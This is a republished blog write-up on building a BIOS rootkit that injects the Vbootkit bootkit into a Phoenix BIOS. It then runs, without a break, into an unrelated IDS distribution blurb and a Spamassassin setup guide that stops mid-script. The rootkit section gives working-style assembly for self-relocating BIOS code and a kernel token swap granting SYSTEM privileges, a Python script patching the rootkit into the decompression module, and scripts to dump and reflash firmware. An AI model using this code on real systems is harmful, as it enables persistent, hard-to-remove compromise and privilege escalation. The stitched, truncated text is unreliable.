This research is published for purely educational purposes and is the work of its original authors, not of CyberPunk in any way. Many thanks and all the credit go to them. Please take the time to visit their page and support the researchers.


Currently there is a very limited amount of sample code available for the creation of BIOS rootkits, with the only publicly available code being released along with the initial BIOS rootkit demonstration in March of 2009 (as far as I’m aware). My first goal was to reproduce the findings made by Core Security in 2009, and then my second task was to investigate how I could extend their findings. My ultimate goal was to create some sort of BIOS based rootkit which could easily be deployed.

In 2009 there was research done into a similar area of security, which is boot sector based rootkits. Unlike BIOS based rootkits, developments in this area have progressed rapidly, which has led to a number of different master boot record (MBR) based rootkits being developed and released. This type of rootkit was termed a “Bootkit”, and similar to a BIOS based rootkit it aims to load itself before the OS is loaded. This similarity led a number of bootkit developers to remark that it should be possible to perform this type of attack directly from the BIOS instead of loading from the MBR. Despite the comments and suggestions that this bootkit code could be moved into the BIOS for execution, there have not yet been any examples of such code made public.

The first stage for completing this project was to set up a test and development environment where BIOS modifications could be made and debugged. In their paper on Persistent BIOS Infection, Sacco and Ortega detail how they discovered that VMware contains a BIOS rom as well as a GDB server which can be used for debugging applications starting from the BIOS itself. After getting everything going successfully in VMware, work was done to port the VMware BIOS modifications to other similar BIOSes; this is described in the second half of this write-up.

VMware BIOS Configuration

Ok, enough background, on to actually doing it!

The first step is to extract the BIOS from VMware itself. In Windows, this can be done by opening the vmware-vmx.exe executable with any resource extractor, such as Resource Hacker. There are a number of different binary resources bundled into this application, and the BIOS is stored in resource ID 6006 (at least in VMware 7). In other versions this may be different, but the key thing to look for is the resource file that is 512 KB in size. The following image shows what this looks like in Resource Hacker:


While this BIOS image is bundled into the vmware-vmx.exe application, it is also possible to use it separately, without the need to merge it back into the vmware executable after each change. VMware allows for a number of “hidden” options to be specified in an image’s VMX settings file. At some point I plan to document a bunch of them on the Tools page of this website, because some really are quite useful! The ones which are useful for BIOS modifications and debugging are the following:

bios440.filename = "BIOS.ROM"
debugStub.listen.guest32 = "TRUE"
debugStub.hideBreakpoint = "TRUE"
monitor.debugOnStartGuest32 = "TRUE"

The first setting allows for the BIOS rom to be loaded from a file instead of the vmware-vmx application directly. The following two lines enable the built in GDB server. This server listens for connections on port 8832 whenever the image is running. The last line instructs VMware to halt code execution at the first line of the guest image’s BIOS. This is very useful as it allows breakpoints to be defined and memory to be examined before any BIOS execution takes place. Testing was done using IDA Pro as the GDB client, and an example of the VMware guest image halted at the first BIOS instruction can be seen in the screenshot below:
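
Adding these options by hand after every test VM rebuild gets tedious. The following is a minimal Python sketch that merges the four settings into the text of a VMX file, replacing a key if it is already present and appending it otherwise. The function name apply_vmx_settings is hypothetical, and the simple key = "value" line format is an assumption based on the settings listed above.

```python
def apply_vmx_settings(vmx_text, settings):
    """Return vmx_text with each key set to the given value (replace or append)."""
    remaining = dict(settings)
    out = []
    for line in vmx_text.splitlines():
        key = line.split("=", 1)[0].strip()
        if "=" in line and key in remaining:
            # The key already exists: overwrite its value in place.
            out.append('%s = "%s"' % (key, remaining.pop(key)))
        else:
            out.append(line)
    # Any key not seen in the file is appended at the end.
    for key, value in remaining.items():
        out.append('%s = "%s"' % (key, value))
    return "\n".join(out) + "\n"

BIOS_DEBUG_SETTINGS = {
    "bios440.filename": "BIOS.ROM",
    "debugStub.listen.guest32": "TRUE",
    "debugStub.hideBreakpoint": "TRUE",
    "monitor.debugOnStartGuest32": "TRUE",
}

existing = 'displayName = "bios-test"\nbios440.filename = "old.rom"\n'
result = apply_vmx_settings(existing, BIOS_DEBUG_SETTINGS)
print(result)
```

The function works on text rather than on a file path so that it can be tested without touching a real virtual machine; writing the result back to the VMX file should only be done while the VM is powered off.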


When initially using this test environment, there were significant issues with IDA’s connection to the GDB server. After much trial and error and testing with different GDB clients, it was determined that the version of VMware was to blame. Versions 6 and 6.5 do not appear to work very well with IDA, so VMware version 7 was used for the majority of the testing. The BIOS is comprised of 16 bit code, and not the 32 bit code that IDA defaults to, so defining “Manual Memory Regions” in the debugging options of IDA was necessary. This allowed memory addresses to be defined as 16 bit code so that they would disassemble properly.

Recreating Past Results – VMware BIOS Modification

As noted already, Sacco & Ortega have done two presentations on BIOS modification, and Wojtczuk & Tereshkin have also done a presentation regarding BIOS modification. Of these three presentations, only Sacco & Ortega included any source or sample code which demonstrated their described techniques. Since this was the only existing example available, it was used as the starting point for this BIOS based rootkits project.

The paper by Sacco & Ortega is fairly comprehensive in describing their set up and testing techniques. The VMware setup was completed as described above, and the next step was to implement the BIOS modification code which they had provided. The code provided required the BIOS rom to be extracted into individual modules. The BIOS rom included with VMware is a Phoenix BIOS. Research showed that there were two main tools for working with this type of BIOS, an open source tool called “phxdeco”, and a commercial tool called “Phoenix BIOS Editor”, which is provided directly by Phoenix. The paper by Sacco & Ortega recommended the use of the Phoenix BIOS Editor application and they had designed their code to make use of it. A trial version was downloaded from the internet and it appears to have all of the functionality necessary for this project. Looking for a download link again I can’t find anything that seems even half legitimate, but Google does come up with all kinds of links. I’ll just assume that it should be fairly easy to track down some sort of legitimate trial version still. Once the tools are installed, the next step is to build a custom BIOS.

I first tested that a minor modification to the BIOS image would take effect in VMware, which it did (changed the VMware logo colour). Next, I ran the Python build script provided by Sacco & Ortega for the BIOS modification. Aside from one typo in the Python BIOS assembly script everything worked great and a new BIOS was saved to disk. Loading this BIOS in VMware however did not result in the same level of success, with VMware displaying a message that something had gone horribly wrong in the virtual machine and it was being shut down. Debugging of this issue was done in IDA and GDB, but the problem was difficult to trace (plus there were version issues with IDA). In an effort to get things working quickly, a different version of VMware was loaded, so that the test environment would match that of Sacco & Ortega. After some searching, the exact version of VMware that they had used was located and installed. This unfortunately still did not solve the issue; the same crash error was reported by VMware. While I had seen this BIOS modification work when demonstrated as part of their presentation, it was now clear that their example code would require additional modification before it could work on any test system.

Many different things were learned as a result of debugging Sacco & Ortega’s code, and eventually the problem was narrowed down to an assembler instruction which was executing a far call to an absolute address which was not the correct address for the BIOS being used. With the correct address entered the BIOS code successfully executed, and the rootkit began searching the hard drive for files to modify. This code took a very long time to scan across the hard drive (which was only 15 GB), and it was run multiple times before the system would start. The proof of concept code included the functionality to patch notepad.exe so that it would display a message when started, or to modify the /etc/passwd file on a Unix system so that the root password would be set to a fixed value. This showed that the rootkits can be functional on both Windows and Linux systems, even if only used for simple purposes.

Bootkit Testing

Although this happened significantly later in the project timeline, the functionality of various bootkits was also tested, and their results recreated, to determine which would work best not just as a bootkit but also as a BIOS based rootkit. Four different bootkits were examined: Stoned, Whistler, Vbootkit and Vbootkit2. The Stoned and Whistler bootkits were designed to function much more like malware than a rootkit, and did not have a simple source code structure.

The Vbootkit2 bootkit was much different, as it was not designed to be malware and had (relatively) well documented source code. This bootkit was designed to be run from a CD, but was only tested with Windows 7 beta. When used with Windows 7 retail, the bootkit simply did not load, as different file signatures were used by Windows. Some time was spent determining the new file signatures so that this bootkit could be tested, but it would still not load successfully. To allow for testing, a beta copy of Windows 7 was obtained instead. When the Vbootkit2 software was run on a Windows 7 beta system, everything worked as expected. The Vbootkit2 software included the ability to escalate a process to System (above admin) level privileges, to capture keystrokes, and to reset user passwords. These were all items that would be valuable to have included in a rootkit, but significant work remained to port this application to Windows 7 retail.

The Vbootkit software was examined next; it was designed to work with Windows 2003, XP and 2000. While it was not packaged so that it could be run from CD, only minor modifications were required to add that functionality. This software only included the ability to escalate process privileges, but that alone is a very valuable function. This bootkit software was chosen for use with the BIOS rootkit, which is described in the next section.

NVLabs are the authors of the bootkit itself, which in many ways represents the main functionality of this project, so a big thanks to them for making their code public! It appears their source code is no longer available on their website, but it can still be downloaded from here.

BIOS Code Injection

The proof of concept code by Sacco & Ortega which was previously tested was very fragile, and its functions were not the type of actions that a rootkit should be performing. The first step in developing a new rootkit was to develop a robust method of having the BIOS execute additional code.

Sacco & Ortega patched the BIOS’s decompression module since it was already decompressed (so that it could decompress everything else), and it is called as the BIOS is loaded. This reasoning was appropriate, but the hooking techniques needed to be modified. During normal operation, the BIOS would call the decompression module once for each compressed BIOS module that was present. The VMware BIOS included 22 compressed modules, so the decompression code was called 22 times. This module will overwrite our additional code as it resides in buffer space, so it is necessary to have our additional code relocate itself.

The process that I used includes the following steps:

  • Insert a new call at the beginning of the decompression module to our additional code.
  • Copy all of our additional code to a new section of memory.
  • Update the decompression module call to point to the new location in memory where our code is.
  • Return to the decompression module and continue execution.

This process allows for a significant amount of additional code to be included in the BIOS ROM, and for that code to run from a reliable location in memory once it has been moved there. The above four steps can be shown in a diagram as follows:
(mspaint is awesome)

Implementing this code in assembler was possible in a number of different ways, but the goal was to create code that would be as system independent as possible. To accomplish this, all absolute addressing was removed, and only near calls or jumps were used. The exceptions to this were any references to our location in the free memory, as that was expected to be a fixed location, regardless of the system. The following is the assembler code which was used to handle the code relocation:

; The following two push instructions will save the current state of the registers onto the stack.
pusha
pushf

; Segment registers are cleared as we will be moving all code to segment 0
xor ax, ax              ; (This may or may not be obvious, but xor'ing the register sets it to 0).
xor di, di
xor si, si
push cs                 ; Push the code segment so it can be popped into the data segment, letting us overwrite the calling address code
pop ds                  ; (CS is moved to DS here)
mov es, ax              ; Destination segment (0x0000)
mov di, 0x8000          ; Destination offset, all code runs from 0x8000
mov cx, 0x4fff          ; The size of the code to copy, approximated as copying extra doesn't hurt anything

; The following call serves no program flow purpose, but will push the calling address (ie, where this code
; is executing from) onto the stack. This allows the code to generically patch itself no matter where it might
; be in memory. If this technique was not used, knowledge of where in memory the decompression module would be
; loaded would be required in advance (so it could be hard coded), which is not a good solution as it differs for every system.
call b
b:
pop si                  ; This will pop our current address off the stack (basically like copying the EIP register)
add si, 0x30            ; How far ahead we need to copy our code
rep movsw               ; This will repeat the movsw command until cx is decremented to 0. When this command is
                        ; finished, our code will be copied to 0x8000
mov ax, word [esp+0x12] ; This will get the caller address to patch the original hook (0x12 bytes were pushed by pusha and pushf)
sub ax, 3               ; Backtrack to the start of the calling address, not where it left off
mov byte [eax], 0x9a    ; The calling function needs to be changed to a Call Far instead of a Call Near
add ax, 1               ; Move ahead to set a new address to be called in future
mov word [eax], 0x8000  ; The new address for this code to be called at
mov word [eax+2], 0x0000 ; The new segment (0)

; The code has now been relocated and the calling function patched, so everything can be restored and we can return.
popf
popa

; The following instructions were overwritten with the patch to the DECOMPC0.ROM module, so we need to run them now before we return.
mov bx,es
mov fs,bx
mov ds,ax
ret                     ; Updated to a near return

Once the above code is executed, it will copy itself to memory offset 0x8000, and patch the instruction which initially called it, so that it will now point to 0x8000 instead. For initially testing this code, the relocated code was simply a routine which would display a “W” to the screen (see screenshot below). The end goal however was that our rootkit code could be called instead, so the next modification was to integrate that code.
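
The self-patching step is easier to follow when the bytes are written out. The following is a minimal Python sketch that simulates it on a byte buffer, assuming the original hook is a 3-byte 16-bit near call (opcode 0xE8 plus a 2-byte relative offset) and that the replacement is a 5-byte far call (opcode 0x9A plus offset and segment). The function name patch_caller and the sample buffer are hypothetical.

```python
import struct

NEAR_CALL_LEN = 3        # 16-bit near call: opcode E8 + 2-byte relative offset
FAR_CALL_OPCODE = 0x9A   # far call: opcode 9A + 2-byte offset + 2-byte segment

def patch_caller(memory, return_addr, new_offset=0x8000, new_segment=0x0000):
    """Rewrite the near call that ends at return_addr into a far call."""
    call_addr = return_addr - NEAR_CALL_LEN        # sub ax, 3
    memory[call_addr] = FAR_CALL_OPCODE            # mov byte [eax], 0x9a
    # mov word [eax], 0x8000 and mov word [eax+2], 0x0000 (after add ax, 1)
    struct.pack_into("<HH", memory, call_addr + 1, new_offset, new_segment)
    return call_addr

# A toy "decompression module": a near call at offset 4, returning to offset 7.
memory = bytearray(16)
memory[4:7] = b"\xE8\x10\x00"
patched_at = patch_caller(memory, return_addr=7)
print(patched_at, memory[4:9].hex())
```

Because the far call is two bytes longer than the near call it replaces, the patch also overwrites the two bytes that follow the original call, so whatever lived there has to be accounted for by the relocated code.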


As noted in the earlier section, the “VBootkit” software was determined to be the best fit for the type of rootkit functionality that could be loaded from the BIOS. The VBootkit software was originally created so that it would run from a bootable CD. While this starting point is similar to running from the BIOS, there are a number of key differences. These differences are mainly based on the booting process, which is shown below:

Our BIOS based rootkit code will run somewhere in between the BIOS Entry and the BIOS Loading Complete stages. A bootkit would instead run at the last stage, starting from 0x7C00 in memory.

The VBootkit software was designed so that it would be loaded into address 0x7C00, at which point it would relocate itself to address 0x9E000. It would then hook interrupt 0x13, and would then read the first sector from the hard drive (the MBR) into 0x7C00, so that it could execute as if the bootkit was never there. This process needed to be modified so that all hard coded addresses were replaced (as the bootkit is no longer executing from 0x7C00). Additionally, there is no need to load the MBR into memory as the BIOS will do that on its own.

The VBootkit software hooks interrupt 0x13, that is, it replaces the address that the interrupt would normally go to with its own address, and then calls the original interrupt handler after doing additional processing. This turned out to require an additional modification, as interrupt 0x13 is still not fully initialized when our BIOS rootkit code is first called. This was overcome by storing a count in memory of how many times the decompression module had been run. If it had been run more than 22 times (for 22 modules), then the BIOS was fully initialized, and we could safely hook interrupt 0x13.
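
The counting trick and the hook itself can be modelled on a byte buffer standing in for low memory. The following is a minimal Python sketch, relying on the real-mode layout in which each interrupt vector is a 2-byte offset followed by a 2-byte segment, stored at interrupt number times 4. The class and function names are hypothetical, and the handler address 0x9E00:0x0000 is an assumption chosen to match the 0x9E000 relocation target mentioned above.

```python
import struct

IVT_ENTRY_SIZE = 4  # each real-mode vector: 2-byte offset, then 2-byte segment

def read_vector(memory, int_no):
    """Return (offset, segment) stored in the interrupt vector table for int_no."""
    return struct.unpack_from("<HH", memory, int_no * IVT_ENTRY_SIZE)

def hook_vector(memory, int_no, new_offset, new_segment):
    """Install a new handler and return the old (offset, segment) for chaining."""
    old = read_vector(memory, int_no)
    struct.pack_into("<HH", memory, int_no * IVT_ENTRY_SIZE, new_offset, new_segment)
    return old

class DecompressionHook:
    """Count calls and hook int 0x13 only once the BIOS has unpacked its modules."""

    def __init__(self, memory, module_count=22):
        self.memory = memory
        self.module_count = module_count
        self.calls = 0
        self.old_int13 = None

    def on_call(self):
        self.calls += 1
        if self.old_int13 is None and self.calls > self.module_count:
            # Segment 0x9E00, offset 0 is physical address 0x9E000 (assumed handler location).
            self.old_int13 = hook_vector(self.memory, 0x13, 0x0000, 0x9E00)

low_memory = bytearray(1024)                    # room for all 256 vectors
hook_vector(low_memory, 0x13, 0x1234, 0xF000)   # pretend BIOS disk handler
hook = DecompressionHook(low_memory)
for _ in range(22):
    hook.on_call()
before = read_vector(low_memory, 0x13)
hook.on_call()
after = read_vector(low_memory, 0x13)
print(before, after, hook.old_int13)
```

Keeping the old vector is what allows the hook to pass every disk request on to the original handler after inspecting it.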

The Vbootkit software works as follows:

  • When first called it will relocate itself to 0x9E000 in memory (similar to our BIOS relocation done previously)
  • Next it will hook interrupt 0x13, which is the hard disk access interrupt
  • All hard disk activity will be examined to determine what data is being read
  • If the Windows bootloader is read from the hard disk, the bootloader code will be modified before it is stored in memory
  • The modification made to the bootloader will cause it to modify the Windows kernel. This in turn will allow arbitrary code to be injected into the Windows kernel, allowing for the privilege escalation functionality.

With our BIOS injection plus the bootkit loaded the process flow happens as follows:

The result of all of these modifications is a BIOS which copies the bootkit into memory and executes it, loads the OS from the hard drive, and then ends with an OS which has been modified so that certain processes will run with additional privileges. The following screenshot shows the bootkit code displaying a message once it finds the bootloader and the kernel and successfully patches them:


The code used for this rootkit was set to check for any process named “pwn.exe”, and if found, give it additional privileges. This is done every 30 seconds, so the differences in privileges are easy to see. This function can be seen in the code and screenshot below:

xor ecx,ecx
mov word cx, [CODEBASEKERNEL + Imagenameoffset]
cmp dword [eax+ecx], "PWN."         ; Check if the process is named PWN.exe
je patchit
jne donotpatchtoken             ; jmp takes 5 bytes but this takes 2 bytes

mov word cx, [CODEBASEKERNEL + SecurityTokenoffset]
mov dword [eax + ecx],ebx       ; replace it with services.exe token, offset for sec token is 200


The BIOS rootkit which has been developed could definitely include more functionality (such as what is included in Vbootkit2), but still acts as an effective rootkit in its current state.

BIOS Decompression and Patching

Now that we know how we want the rootkit to be injected into the BIOS, the next step is to actually patch the BIOS with our rootkit code. To do this we need to extract all of the BIOS modules, patch the decompression module, and reassemble everything. The modules can be extracted using the phnxdeco command line tool, or the Phoenix BIOS Editor. Once the decompression module is extracted, the following code will patch it with our rootkit:

import os,struct,sys
# BIOS Decompression module patching script - By Wesley Wineberg
# The Phoenix BIOS Editor application (for Windows) will generate a number of module files
# including the decompression module which will be named "DECOMPC0.ROM". These files are
# saved to C:\Program Files\Phoenix Bios Editor\TEMP (or similar) once a BIOS WPH file is
# opened. The decompression module file can be modified with this script. Once modified,
# any change can be made to the BIOS modules in the BIOS editor so that a new BIOS WPH file
# can be generated by the BIOS editor. The decompression module can alternatively be
# extracted by phnxdeco.exe, but this does not allow for reassembly. This script requires
# that NASM be present on the system it is run on.
# This patching script requires the name and path to the BIOS rootkit asm file to be passed
# as an argument on the command line.
# This script will modify the DECOMPC0.ROM file located in the same directory as the script
# so that it will run the BIOS rootkit asm code.
# Display usage info
if len(sys.argv) < 2:
print "Modify and rebuild Phoenix BIOS DECOMP0.ROM module. Rootkit ASM code filename
# Find rootkit code name
shellcode = sys.argv[1].lower()
# Assemble the assembler code to be injected. NASM is required to be present on the system
# or this will fail!
os.system('nasm %s' % shellcode)
# Open and display the size of the compiled rootkit code
shellcodeout = shellcode[0:len(shellcode)-4]
decomphook = open(shellcodeout,'rb').read()
print "Rootkit code loaded: %d bytes" % len(decomphook)
# The next line contains raw assembly instructions which will be placed 0x23 into the
# decompression rom file. The decompression rom contains a header, followed by a number of
# push instructions and then a CLD instruction. This code will be inserted immediately
# after, and will overwrite a number of mov instructions. These need to be called by the
# rootkit code before it returns so that the normal decompression functions can continue.
# The assembler instruction contained below is a Near Call which will jump to the end of the
# decompression rom where the rootkit code has been inserted. This is followed by three NOP
# instructions as filler.
minihook = '\xe8\x28\x04\x90\x90\x90'
# The following would work but is an absolute call, not ideal!
# minihook = '\x9a\x5A\x04\xDC\x64\x90' # call far +0x45A
# Load the decompression rom file
decorom = open('DECOMPC0.ROM','rb').read()
# Hook location is 0x23 in to the file, just past the CLD instruction

# Insert hook contents into the decompression rom, overwriting what was there previously
decorom = decorom[:hookoffset]+minihook+decorom[len(minihook)+hookoffset:]
# Pad the decompression rom with 100 NOP instructions. This is not needed, but does make it
# easier to identify where the modification has taken place.
# Pad an additional 10 NOP's at the end.
# Recalculate the ROM size, so that the header can be updated
# Save the patched decompression rom over the previous copy
# Output results
print "The DECOMPC0.ROM file has now been patched."

An example of how to call the above script would be:

python biosrootkit.asm

If everything works successfully, you should see something similar to the following:

Rootkit code loaded: 1845 bytes
The DECOMPC0.ROM file has now been patched.

BIOS Reassembly

For raw BIOS files, such as the one included with VMware, a number of command line utilities included with the Phoenix Bios Editor (or available from Intel) can be used to reassemble everything. Later on when testing with a real PC it was necessary to save the BIOS in more than just the raw format, so the tool for reassembly used was the GUI version of the Phoenix Bios Editor. This unfortunately means that it is not possible to simply have one application that can be run on a system which will infect the BIOS, at least not using off the shelf tools.

This now means that the BIOS infection is a three stage process, requiring some manual intervention mainly for the reassembly. The following shows the Phoenix BIOS Editor with a BIOS image open:


The Phoenix BIOS Editor is not specifically designed for swapping modules in and out, but does effectively allow for it. When a BIOS image is first opened, all of the BIOS modules will be extracted to disk in a folder located at C:\Program Files\Phoenix BIOS Editor\TEMP. The decompression module can be copied from this folder, patched, and replaced. The Phoenix BIOS Editor will not allow you to save a BIOS without a modification, so it is necessary to modify a string value and then change it back (or just leave it) so that the BIOS can be saved.

The BIOS based rootkit source code and patching scripts can be downloaded from the links near the end of this write-up if you would like to try all of this out yourself.

Real PC’s

The Phoenix BIOS was used with all of the VMware based development, so this was also chosen for testing with a physical PC. All of the physical (as opposed to virtual) BIOS testing was done using an HP Pavilion ze4400 laptop. BIOS testing was originally planned for use with PC’s and not laptops, as getting access to the PC motherboard for reflashing if necessary would be much easier. Despite this, quickly locating a PC with a Phoenix BIOS proved to be difficult, so a laptop was used instead (special thanks to David for reflashing my laptop when I accidentally wrote source code to my BIOS!)

PC BIOS Retrieval

The first step to modifying a real system BIOS is to extract a copy of it. Phoenix has two different tools which they generally provide for this purpose, one is called “Phlash16”, and the other is called “WinPhlash”. Phlash16 is a command line utility (with a console based GUI), but will only run from DOS. WinPhlash, as its name suggests, runs from Windows. While this is a GUI based utility, it will also accept command line options, allowing us to automate the process of BIOS retrieval. For this project I ended up making some scripts to automate BIOS extraction and patching, but they’re quite basic and limited.

The following batch script will copy the BIOS into a file named BIOSORIG.WPH, and then check if it has previously been modified. The Perl script simply checks the BIOS contents for my name, which would not be in any unpatched BIOS.

@rem This file dumps the bios and checks if it has previously been patched.
@rem Dump
WinPhlash\WinPhlash.exe /ro=BIOSORIG.WPH
@rem Check if the BIOS has been patched already
Python\PortablePython_1.1_py2.6.1\App\python WinPhlash\BIOSORIG.WPH

PC BIOS Decompression and Patching

With the BIOS retrieved, the next step is to patch it with our rootkit code. This can be done using the exact same scripts that we used for VMware in the sections above. It was a goal of this project to design the patch as well as the patching process to be as compatible as possible. I am quite pleased that this turned out to be completely possible, so that the same tools can be used for completely different hardware running the same type of BIOS.

PC BIOS Reassembly

While there is a free tool which can extract modules from Phoenix BIOS’s, it appears that only the Phoenix Bios Editor will reassemble them as needed for typical PC’s. The WinPhlash tool requires additional information to be included with the BIOS, which it stores along with the raw BIOS in the WPH file. After testing many different options, it appears that the only way to successfully reassemble the WPH file is to use the GUI Phoenix Bios Editor. This unfortunately means that it is not possible to simply have one application that can be run on a system which will infect the BIOS, at least not using off the shelf tools.

Theoretically it should be possible to reverse engineer the WPH format and create a custom BIOS reassembly tool, but this was out of the scope of this project. Instead, the BIOS infection is a three stage process, requiring some manual intervention mainly for the reassembly.

As with patching the VMware BIOS, the same trick to have the Phoenix BIOS Editor reassemble a patched module can be used. When a BIOS image is first opened, all of the BIOS modules will be extracted to disk in a folder located at C:\Program Files\Phoenix BIOS Editor\TEMP. The decompression module can be copied from this folder, patched, and replaced. The Phoenix BIOS Editor will not allow you to save a BIOS without a modification, so it is necessary to modify a string value and then change it back (or just leave it) so that the BIOS can be saved.

BIOS Flashing

Once the BIOS is reassembled into the WPH file, the following batch script will flash the new BIOS image into the BIOS EEPROM and then reboot the PC so that it takes effect:

@rem This file uploads a file named "BIOSPATCHED.WPH" to the BIOS. Will reboot system when done.

Laptop Modification Results

With everything described so far put together, the following shows the BIOS code being flashed onto a laptop (being run from the infect.bat script detailed above):


Once the flash completed, the BIOS rootkit successfully ran and loaded itself into the Windows kernel. The following screenshot shows a command prompt which starts initially as a normal user, and then after 30 seconds has its privileges escalated:


This demonstrated that the BIOS rootkit was portable enough to work on multiple systems (VMware, the HP laptop), and that the infection mechanisms were functional and working properly.

The “rootkit” developed for this project only implements one simple task, but as noted regarding the Vbootkit2 software, there is no reason additional functionality cannot be added to this. BIOS’s made by Phoenix were examined for this project, and it is likely that there are many similarities between Phoenix BIOS’s and BIOS’s from other manufacturers. While it is likely that code will need to be created for each separate manufacturer, there are not a large number of different BIOS vendors, so expanding this rootkit functionality to all of the common manufacturers should be feasible.

In the introduction I noted that new BIOS features, such as signed BIOS updates, make much of what is described here far less of an issue from a security standpoint. That is definitely good to see, but it is also worth remembering that there are more “legacy” computers out there than there are “new” ones, so this type of attack will still remain an issue for quite a while to come.

Demo VMware BIOS and source code

The following source code and patched BIOS are provided as a proof of concept. It is in no way my intention that people take this and use it for any malicious purposes, but rather to demonstrate that such attacks are completely feasible on older BIOS configurations. I do not expect that it is very feasible to take this in its current form and turn it into any sort of useful malware, and based on that I am posting this code online.

As noted in the earlier sections, this code should work to patch most “Phoenix” BIOS’s. The patching scripts can be downloaded here:

The source code for the BIOS rootkit can be downloaded here:

You will need NASM to compile the code to patch into the BIOS if you are using the above scripts / source code. NASM should either be added to your path variable, or you should update the patching script to have an absolute path to it for it to work successfully. You will also need a copy of the Phoenix BIOS Editor, or a free tool equivalent to combine the decompression module back into a complete BIOS.

If you don’t want to compile this all yourself and would simply like to try it, a pre-patched BIOS for use with VMware can be downloaded here:

PoC Usage and Notes

If you don’t feel like reading through the whole write-up above, here is the summary of how to try this out, and what it does.

  • First, download the BIOS_rootkit_demo.ROM BIOS image from the above link.
  • To try it, you need a copy of VMware installed, and a guest Windows XP operating system to test with. I’ve personally tested this with a bunch of different versions of VMware Workstation, as well as the latest version of VMware Player (which is free). I am also told that VMware Fusion works just fine too.
  • Before opening your guest WinXP VM, browse to where you have the VM stored on your computer, and open the .vmx file (ie WindowsXP.vmx or whatever your VM is called) in notepad. Add a new line at the end that matches the following: bios440.filename = "BIOS_rootkit_demo.ROM". Make sure you copy BIOS_rootkit_demo.ROM to that folder while you’re at it.
  • Now open and start the VM, then rename a program to pwn.exe (cmd.exe for example).
  • Wait 30 seconds, and then start the Task Manager. Pwn.exe should be running as user “SYSTEM” now instead of whatever user you are logged into XP with.

The list of steps described above should work in an ideal world. Testing has shown the following caveats however!

  • OS instability. Sometimes when booting or just simply closing your pwn.exe application Windows will BSOD.
  • Task Manager will lie about your process user if you open it in advance of the 30s permission escalation time. Use something like cmd with whoami to properly check what your permissions are.
  • While I have loaded this successfully onto a real PC, I take no responsibility for the results if you do the same. I’d love to hear about it if you brick your motherboard in some horrendous way, but I probably won’t actually be able to help you with it! Use at your own risk!
  • If you just want to watch a video of what this does, Colin has put one up on YouTube:

    I recommend actually trying it in VMware, it’s way more fun to see a hard drive wipe do nothing, and your system still affected!

Smooth-Sec – a fully-ready IDS/IPS (Intrusion Detection/Prevention System) Linux distribution


Smooth-Sec is a fully-ready IDS/IPS (Intrusion Detection/Prevention System) Linux distribution based on Debian 7 (wheezy), available for 32-bit and 64-bit architectures. The distribution includes the latest version of Snorby, Snort, Suricata, PulledPork and Pigsty. An easy setup process allows you to deploy a complete IDS/IPS system within minutes, even for security beginners with minimal Linux experience.

Source && Download



1) Booting Smoothsec.

2) Language selection.

3) Select a location.

4) Keyboard setup.

5) Hostname.

6) Domain name.

7) Disk partitioning.

8) Confirm disk partitioning.

9) Mirror country setup.

10) Mirror location setup.

11) Apt proxy setup.

12) Grub installation.

13) End of the installation.

14) First boot login screen.

15) First setup.

How To Install and Setup Spamassassin on Linux

How To Install and Setup Spamassassin

Spamassassin is a free and open-source mail filter written in Perl that identifies spam using a wide range of heuristic tests on mail headers and body text. It helps keep unwanted spam out of your mailbox.

Before installing Spamassassin, you need to install and set up a mail transfer agent such as Postfix.

Install Spamassassin

Use apt-get to install Spamassassin and spamc.

apt-get install spamassassin spamc

Once Spamassassin is installed, there are a few steps that have to be taken to make it fully functional.

Adding Spamassassin User

To run Spamassassin you need to create a new user on your VPS.

First add the group spamd:

groupadd spamd

then add the user spamd with the home directory /var/log/spamassassin:

useradd -g spamd -s /bin/false -d /var/log/spamassassin spamd

then create the directory /var/log/spamassassin:

mkdir /var/log/spamassassin

and change the ownership of the directory to spamd:

chown spamd:spamd /var/log/spamassassin

Let’s set up Spamassassin now.

Setting Up Spamassassin

Open the spamassassin config file using:

nano /etc/default/spamassassin

To enable Spamassassin find the line

ENABLED=0

and change it to

ENABLED=1

To enable automatic rule updates in order to get the latest spam filtering rules find the line

CRON=0

and change it to

CRON=1

Now create a variable named SAHOME with the Spamassassin home directory:

SAHOME="/var/log/spamassassin/"
Find and change the OPTIONS variable to

OPTIONS="--create-prefs --max-children 2 --username spamd \
-H ${SAHOME} -s ${SAHOME}spamd.log"

This specifies the username Spamassassin will run under as spamd, as well as add the home directory, create the log file, and limit the child processes that Spamassassin can run.

If you have a busy server, feel free to increase the max-children value.
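
Before starting the daemon, it can help to sanity-check the edited defaults file. The following is a minimal Python sketch, not part of Spamassassin itself: the function names parse_defaults and check_spamd_options are made up for this example, and it only looks for the settings described above (the SAHOME variable and the --username and --max-children options).

```python
import re


def parse_defaults(text):
    """Parse simple KEY=value lines from a shell-style defaults file."""
    settings = {}
    # Join backslash-continued lines so a multi-line OPTIONS value stays together.
    joined = re.sub(r"\\\n\s*", "", text)
    for line in joined.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().strip('"')
    return settings


def check_spamd_options(settings):
    """Return a list of human-readable problems; an empty list means none were found."""
    problems = []
    options = settings.get("OPTIONS", "")
    if "SAHOME" not in settings:
        problems.append("SAHOME is not defined")
    if "--username spamd" not in options:
        problems.append("OPTIONS does not run the daemon as user spamd")
    if "--max-children" not in options:
        problems.append("OPTIONS does not limit child processes")
    return problems


if __name__ == "__main__":
    # Path taken from the text above; reading it may require root.
    with open("/etc/default/spamassassin") as fh:
        for problem in check_spamd_options(parse_defaults(fh.read())):
            print("WARNING:", problem)
```

The parser is deliberately naive: it does not expand ${SAHOME} or handle quoting beyond stripping double quotes, which is enough for the handful of lines edited here.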

Start the Spamassassin daemon with the following command:

service spamassassin start

Now, let’s configure Postfix.

Configuring Postfix

At this point, emails still do not pass through Spamassassin. To change that, open the Postfix config file using:

nano /etc/postfix/

Find the line

smtp      inet  n       -       -       -       -       smtpd

and add the following option on a new, indented line directly below it:

-o content_filter=spamassassin

Now, Postfix will pipe the mail through Spamassassin.

To set up the after-queue content filter, add the following lines to the end of the file:

spamassassin unix -     n       n       -       -       pipe
        user=spamd argv=/usr/bin/spamc -f -e  
        /usr/sbin/sendmail -oi -f ${sender} ${recipient}

For the changes to take effect restart postfix:

service postfix restart

Now postfix will use spamassassin as a spam filter.
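
To double-check the Postfix changes, the two entries described above can be verified with a short script. This is a rough Python sketch under stated assumptions: the helper names parse_master_cf and filter_is_wired are invented for this example, and the parsing only follows the basic convention that a line starting with whitespace continues the previous entry.

```python
def parse_master_cf(text):
    """Group service-table text into logical entries.

    Lines that start with whitespace are treated as continuations of the
    previous entry; blank lines and comments are skipped.
    """
    entries = []
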